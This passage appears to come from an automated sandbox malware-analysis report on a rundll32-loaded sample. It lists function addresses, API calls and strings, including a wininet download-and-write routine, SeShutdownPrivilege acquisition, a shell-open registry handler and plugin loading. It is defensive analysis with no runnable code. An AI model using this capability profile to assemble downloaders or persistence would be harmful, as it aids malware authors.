TlsSetValue.KERNEL32(00000000,?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4AAB
__init_pointers.LIBCMT ref: 04EB4AB5
EncodePointer.KERNEL32(?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4AC6
EncodePointer.KERNEL32(?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4AD3
EncodePointer.KERNEL32(?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4AE0
EncodePointer.KERNEL32(?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4AED
DecodePointer.KERNEL32(Function_00004852,?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4B0E
__calloc_crt.LIBCMT ref: 04EB4B23
DecodePointer.KERNEL32(00000000,?,?,04EB3D15,04ECC518,00000008,04EB3EA9,?,?,?,04ECC538,0000000C,04EB3F64,?), ref: 04EB4B3D
GetCurrentThreadId.KERNEL32 ref: 04EB4B4F

Strings

KERNEL32.DLL, xrefs: 04EB49F2
FlsGetValue, xrefs: 04EB4A1B
FlsSetValue, xrefs: 04EB4A28
FlsFree, xrefs: 04EB4A35
FlsAlloc, xrefs: 04EB4A13

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 712239165e02dc8b7bdb65662e4b0732b74361e396a09b1750fa52f45620062b
Instruction ID: 4d21b4754830fb515f409aec351cd72125a3fcf82feee0298b769b12d91b8405
Opcode Fuzzy Hash: 712239165e02dc8b7bdb65662e4b0732b74361e396a09b1750fa52f45620062b
Instruction Fuzzy Hash: CF3195709003119FEB119FB7EC4AA573FB0EBC0726701172AE5848319AEB38AC16CF94

Function 6D02D500 Relevance: 35.4, APIs: 14, Strings: 6, Instructions: 386networkCOMMON

Download Yara Rule

APIs

WSACreateEvent.WS2_32 ref: 6D02D5E4
WSAGetLastError.WS2_32 ref: 6D02D5F4

Strings

WSACreateEvent failed (%d), xrefs: 6D02D5FB
Time-out, xrefs: 6D02DA0B
Q, xrefs: 6D02D82B
, xrefs: 6D02D99B
WSAEnumNetworkEvents failed (%d), xrefs: 6D02D7EB
WSACloseEvent failed (%d), xrefs: 6D02DA2F

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: $Q$Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
API String ID: 545576003-2343531540
Opcode ID: 6cfdc4861f8aaa264383a94b44a11b723b770b4c66beb97af600f2daa6f03fca
Instruction ID: cf29ceeab4ad33efbb2712f9dd87d5b2102658ad7f3b5aaca46b783f60ab1d11
Opcode Fuzzy Hash: 6cfdc4861f8aaa264383a94b44a11b723b770b4c66beb97af600f2daa6f03fca
Instruction Fuzzy Hash: 41E1CF715093429BF3019B24C844BAABBF4FFC6318F50462DF9989B291D7B69C45CBE2

Function 04EC3260 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 04EC327E
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 04EC3292
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 04EC329D
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 04EC32A8
LoadLibraryA.KERNEL32(kernel32.dll), ref: 04EC32B2
GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04EC32C1
LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 04EC331B
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 04EC3327
CloseHandle.KERNEL32(?), ref: 04EC3337
FreeLibrary.KERNEL32(00000000), ref: 04EC3348
FreeLibrary.KERNEL32(?), ref: 04EC3352

Strings

SeShutdownPrivilege, xrefs: 04EC32EC
AdjustTokenPrivileges, xrefs: 04EC3294
OpenProcessToken, xrefs: 04EC328C
GetLastError, xrefs: 04EC3321
KERNEL32.dll, xrefs: 04EC3316
LookupPrivilegeValueA, xrefs: 04EC329F
ADVAPI32.dll, xrefs: 04EC3273
kernel32.dll, xrefs: 04EC32AA
GetCurrentProcess, xrefs: 04EC32B8

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AddressLibraryProc$Load$Free$CloseHandle
String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
API String ID: 2887716753-2040270271
Opcode ID: b9791fe387f2bcbf0caf64f7d72ca69d7d9319c92e50b995a46c1d6c2c4e2729
Instruction ID: a1c76cf9790dc8b1155bc4e04e3984c10c86979616b1ad19677f6ee64a039160
Opcode Fuzzy Hash: b9791fe387f2bcbf0caf64f7d72ca69d7d9319c92e50b995a46c1d6c2c4e2729
Instruction Fuzzy Hash: D8319871E40318AFDB14ABF59D4AFAFBBB8EF48701F005059E901F7240CA74A9058FA0

Function 04EC3840 Relevance: 35.1, APIs: 6, Strings: 14, Instructions: 96libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,00000000,00000000), ref: 04EC38A8
GetProcAddress.KERNEL32(00000000), ref: 04EC38B1
LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 04EC38E4
GetProcAddress.KERNEL32(00000000), ref: 04EC38E7
LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 04EC3902
GetProcAddress.KERNEL32(00000000), ref: 04EC3905

Strings

niti, xrefs: 04EC3890
ship, xrefs: 04EC38DA
Sid, xrefs: 04EC38FB
eSid, xrefs: 04EC389E
aliz, xrefs: 04EC3897
AndI, xrefs: 04EC3889
Free, xrefs: 04EC38F4
Chec, xrefs: 04EC38BE
Allo, xrefs: 04EC387B
enMe, xrefs: 04EC38CC
Advapi32.dll, xrefs: 04EC38BA, 04EC38BD
mber, xrefs: 04EC38D3
cate, xrefs: 04EC3882
kTok, xrefs: 04EC38C5

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Advapi32.dll$Allo$AndI$Chec$Free$Sid$aliz$cate$eSid$enMe$kTok$mber$niti$ship
API String ID: 2574300362-3168299024
Opcode ID: dd4ee105eb0b07f7de73d363445292c62bf92bd984de6633e37263d24922b8ff
Instruction ID: b2e3058e9eddb8ec8abccdd14481c531a66bd7480e233e4c6b75c9736e4c4e4e
Opcode Fuzzy Hash: dd4ee105eb0b07f7de73d363445292c62bf92bd984de6633e37263d24922b8ff
Instruction Fuzzy Hash: 7831F0B2D0131CABCB10DFE9D985AEEBBB8FF48700F108519E505AB244DAB45A05CFA5

Function 04EC5C20 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 181stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EC5C42
_strrchr.LIBCMT ref: 04EC5C4A
_memset.LIBCMT ref: 04EC5C7E
_strrchr.LIBCMT ref: 04EC5C86
_memset.LIBCMT ref: 04EC5D12
wsprintfA.USER32 ref: 04EC5D2A
_memset.LIBCMT ref: 04EC5D3E
_memset.LIBCMT ref: 04EC5D58
ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 04EC5D9A
lstrcatA.KERNEL32(?,04ECB7B4), ref: 04EC5DE2
lstrcatA.KERNEL32(?), ref: 04EC5DEC

Strings

D, xrefs: 04EC5E0F
"%1, xrefs: 04EC5DA6
WinSta0\Default, xrefs: 04EC5E1B
%s\shell\open\command, xrefs: 04EC5D24

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$_strrchrlstrcat$EnvironmentExpandStringswsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 609515672-33419044
Opcode ID: a887338a40dceb297399aee63f021db6d48cc4fe0ab19504e524017298b6d7b8
Instruction ID: 3f42463c7235491de30ec70949b38ab683cf53238d70ccb5344d0ed5c77cc480
Opcode Fuzzy Hash: a887338a40dceb297399aee63f021db6d48cc4fe0ab19504e524017298b6d7b8
Instruction Fuzzy Hash: A651FB7194032CBBEB25DB60DD46FDB77B89F04B09F4051D8EA49AA180EA70B745CF91

Function 04EC6F80 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 132libraryloaderfileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(04EC5B63,00000000,00000001,?), ref: 04EC6FA9
LoadLibraryA.KERNEL32(wininet.dll), ref: 04EC6FC2
GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 04EC6FD6
FreeLibrary.KERNEL32(00000000), ref: 04EC6FF4
GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 04EC7013
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04EC7046
_memset.LIBCMT ref: 04EC706E
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 04EC707C
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 04EC70B2
CloseHandle.KERNEL32(?), ref: 04EC70C8
Sleep.KERNEL32(00000001), ref: 04EC70D0
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 04EC70DC
FreeLibrary.KERNEL32(00000000), ref: 04EC70F1

Strings

InternetOpenA, xrefs: 04EC6FD0
InternetCloseHandle, xrefs: 04EC70D6
InternetOpenUrlA, xrefs: 04EC700D
wininet.dll, xrefs: 04EC6FB1
MSIE 6.0, xrefs: 04EC6FDC
InternetReadFile, xrefs: 04EC7076

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AddressProc$FileLibrary$Free$CloseCreateDeleteHandleLoadSleepWrite_memset
String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 455779405-4269851202
Opcode ID: b617d38fbf97356bf59f5847fa909d153dfc290936f39d0c54fa1c8da53b307a
Instruction ID: 05a26d845177b3e1aba0e30e51c7ada408bdeb1768ad389734cc6ee25138ed2a
Opcode Fuzzy Hash: b617d38fbf97356bf59f5847fa909d153dfc290936f39d0c54fa1c8da53b307a
Instruction Fuzzy Hash: D84186F1640218AFD7209BA5DD86FDE73BCEF44705F1041A9F705A7141CA746E468FA8

Function 6D016C90 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 255COMMON

Download Yara Rule

Strings

Digest, xrefs: 6D016D1F
%sAuthorization: Basic %s, xrefs: 6D016E6E
Authorization: Bearer %s, xrefs: 6D016EFD
Proxy-, xrefs: 6D016E65, 6D016E6D
%s auth using %s with user '%s', xrefs: 6D016F61
%s:%s, xrefs: 6D016DF4
AWS_SIGV4, xrefs: 6D016CB3
Bearer, xrefs: 6D016EEC
Proxy-authorization, xrefs: 6D016D5F
Negotiate, xrefs: 6D016CDA
Proxy, xrefs: 6D016F57, 6D016F60
Basic, xrefs: 6D016DD7
NTLM, xrefs: 6D016CFC
Authorization, xrefs: 6D016DA1, 6D016ED4
Server, xrefs: 6D016F52

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
API String ID: 0-3819500859
Opcode ID: 04e623dbf09301f1a13206f1723b878d66a705c38753ea1a8317d736c110e7df
Instruction ID: 9881b2655aa3de643f9af9829eb454d148cfee0503907fe0e8314c807ff6c3a6
Opcode Fuzzy Hash: 04e623dbf09301f1a13206f1723b878d66a705c38753ea1a8317d736c110e7df
Instruction Fuzzy Hash: 0981D53560C3069BF7109BA8DC00B7B77E5EF85354F84052EE958D7242E732E9098BD2

Function 6D01F540 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 338libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6D03B400: GetModuleHandleA.KERNEL32(ntdll,RtlVerifyVersionInfo,00000000,?), ref: 6D03B42E
Part of subcall function 6D03B400: GetProcAddress.KERNEL32(00000000), ref: 6D03B435

GetModuleHandleA.KERNEL32(ntdll,wine_get_version,?,?,?,?,?,?,00000000,?), ref: 6D01F5C8
GetProcAddress.KERNEL32(00000000), ref: 6D01F5CF

Part of subcall function 6D03B400: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 6D03B501
Part of subcall function 6D03B400: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 6D03B50B
Part of subcall function 6D03B400: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 6D03B528
Part of subcall function 6D03B400: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 6D03B534

Strings

schannel: using IP address, SNI is not supported by OS., xrefs: 6D01F6F9
schannel: initial InitializeSecurityContext failed: %s, xrefs: 6D01F8EC, 6D01F91C
Error setting ALPN, xrefs: 6D01F734
schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 6D01F993
schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 6D01F9A8
schannel: SNI or certificate check failed: %s, xrefs: 6D01F904
ntdll, xrefs: 6D01F5C3
ALPN: offers %s, xrefs: 6D01F7C5
Failed to set SNI, xrefs: 6D01F695
schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 6D01F5AA
schannel: unable to allocate memory, xrefs: 6D01F863
wine_get_version, xrefs: 6D01F5BE

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ConditionMask$AddressHandleModuleProc
String ID: ALPN: offers %s$Error setting ALPN$Failed to set SNI$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
API String ID: 3530165345-1248198160
Opcode ID: 43c912adddca81702464b986e0b91cbe090633eaab1e56cf5988151781ae1e71
Instruction ID: 586a753f187c04c01ba3ec0e13ce2d4aaf69cdb3fe6677b79235ac3daae73d9e
Opcode Fuzzy Hash: 43c912adddca81702464b986e0b91cbe090633eaab1e56cf5988151781ae1e71
Instruction Fuzzy Hash: 23C16DB2508345AFF710DF64CC44FABBBECBB85308F414829FA8597282D7B5D5548BA2

Function 6D017F70 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 337COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D017FC3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D01805B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D01807E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D018091
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0180CF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D01812D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D018156
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D018169
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0182AB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0182BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0182DE

Strings

%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 6D0183C1
** Resuming transfer from byte position %I64d, xrefs: 6D017FEE
%% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 6D018001

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
API String ID: 885266447-664487449
Opcode ID: 881ea4d27c42554b82551066d1db38d547f82f84feb7d47deca38dcf50fdde05
Instruction ID: 405a59f9d4f45ecd80f5e59edba037a655f8302c3b9a8994deaa6e8d6cde19b2
Opcode Fuzzy Hash: 881ea4d27c42554b82551066d1db38d547f82f84feb7d47deca38dcf50fdde05
Instruction Fuzzy Hash: B0D14B71A0C745AFF7518AA4CD80FABB7E9FF89304F10492DFA9953251E735BA008B52

Function 04EC6200 Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 301COMMON

Download Yara Rule

Strings

getDllName, xrefs: 04EC6435
ARPD, xrefs: 04EC62BF, 04EC6332
isARDll, xrefs: 04EC628F
PluginMe, xrefs: 04EC6482, 04EC65E6
%s\%s, xrefs: 04EC6389
isCSDll, xrefs: 04EC6474

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID:
String ID: %s\%s$ARPD$PluginMe$getDllName$isARDll$isCSDll
API String ID: 0-3715897580
Opcode ID: 64cf316849a0634f15edb8c1fd2c14dec9df895917a421249814fde391402654
Instruction ID: a6ee8cbeff6635939b7fd568f42e18f921c90b896ab526f78d053ac1d1c6b828
Opcode Fuzzy Hash: 64cf316849a0634f15edb8c1fd2c14dec9df895917a421249814fde391402654
Instruction Fuzzy Hash: 17B11671D006149FEB20DBB49D41BEFB7B4AF44319F0056ECE549A7280EA71BE468F91

Function 04EC3370 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 90libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,1CA2304D), ref: 04EC33BA
GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 04EC33D0
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 04EC33DE
GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 04EC33EC
GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 04EC33FA
LoadLibraryA.KERNEL32(kernel32.dll), ref: 04EC3407
GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 04EC3417

Strings

CloseDesktop, xrefs: 04EC33F4
GetCurrentThreadId, xrefs: 04EC3411
user32.dll, xrefs: 04EC33AF
kernel32.dll, xrefs: 04EC3402
SetThreadDesktop, xrefs: 04EC33E6
GetUserObjectInformationA, xrefs: 04EC33D8
GetThreadDesktop, xrefs: 04EC33C4

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
API String ID: 2238633743-588083535
Opcode ID: d2fa4d06167513a8e324ce731068c686c51e9f7f9f140b5a90f5c79801b342ad
Instruction ID: e6be24443df40e404413646f2747cdf28a9f3cd71a12cd4f32109640c6f8d197
Opcode Fuzzy Hash: d2fa4d06167513a8e324ce731068c686c51e9f7f9f140b5a90f5c79801b342ad
Instruction Fuzzy Hash: EB311E71A40228AFDB15DF65DD85BEEBBB8FB48B14F00419AE909A7240DB746E41CF50

Function 6D03F720 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 172fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 6D03F8E1
GetLastError.KERNEL32(?,00000100), ref: 6D03F926

Part of subcall function 6D01A940: GetLastError.KERNEL32 ref: 6D01A9A5
Part of subcall function 6D01A940: SetLastError.KERNEL32(00000000), ref: 6D01A9B0

GetLastError.KERNEL32(?,00000100,?), ref: 6D03F774

Part of subcall function 6D01A940: GetLastError.KERNEL32 ref: 6D01A943

Part of subcall function 6D03F520: CryptQueryObject.CRYPT32(00000002,?,00000002,0000000E,00000000,00000000,?,00000000,00000000,00000000,?), ref: 6D03F601
Part of subcall function 6D03F520: CertAddCertificateContextToStore.CRYPT32(?,?,00000004,00000000), ref: 6D03F622
Part of subcall function 6D03F520: CertFreeCertificateContext.CRYPT32(00000000), ref: 6D03F62E
Part of subcall function 6D03F520: GetLastError.KERNEL32(?,00000100), ref: 6D03F648

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?), ref: 6D03F7B2
GetLastError.KERNEL32(?,00000100), ref: 6D03F7CB

Strings

schannel: invalid path name for CA file '%s': %s, xrefs: 6D03F782
schannel: CA file exceeds max size of %u bytes, xrefs: 6D03F852
schannel: failed to read from CA file '%s': %s, xrefs: 6D03F937
schannel: failed to open CA file '%s': %s, xrefs: 6D03F7D9
schannel: failed to determine size of CA file '%s': %s, xrefs: 6D03F821

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$CertCertificateContext$CloseCreateCryptFileFreeHandleObjectQueryStore
String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
API String ID: 2812708033-3430970913
Opcode ID: ec4495367144c0a21e79fbfd7ba4ad69c4f44b08f09b94ae6e080c0a08f802d6
Instruction ID: 0cf55f8c5d6e40d669b81311d6317d8fa064441f11656f4a1b0bba505cf20298
Opcode Fuzzy Hash: ec4495367144c0a21e79fbfd7ba4ad69c4f44b08f09b94ae6e080c0a08f802d6
Instruction Fuzzy Hash: 8751F3B2948312ABF7109B618C44FAB7BFCEB4A314F020529F649E7181DB74E504CBA6

Function 04EC5A90 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 122sleepprocessCOMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04EC5AD5
_memset.LIBCMT ref: 04EC5AF2
GetTempPathA.KERNEL32(00000104,00000000), ref: 04EC5B06
_memset.LIBCMT ref: 04EC5B2C
wsprintfA.USER32 ref: 04EC5B45
GetFileAttributesA.KERNEL32(00000000), ref: 04EC5B75
_memset.LIBCMT ref: 04EC5B8B
Sleep.KERNEL32(000003E8), ref: 04EC5BAC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04EC5BD5

Strings

D, xrefs: 04EC5B98
%s%s, xrefs: 04EC5B3F
WinSta0\Default, xrefs: 04EC5BA2

Memory Dump Source

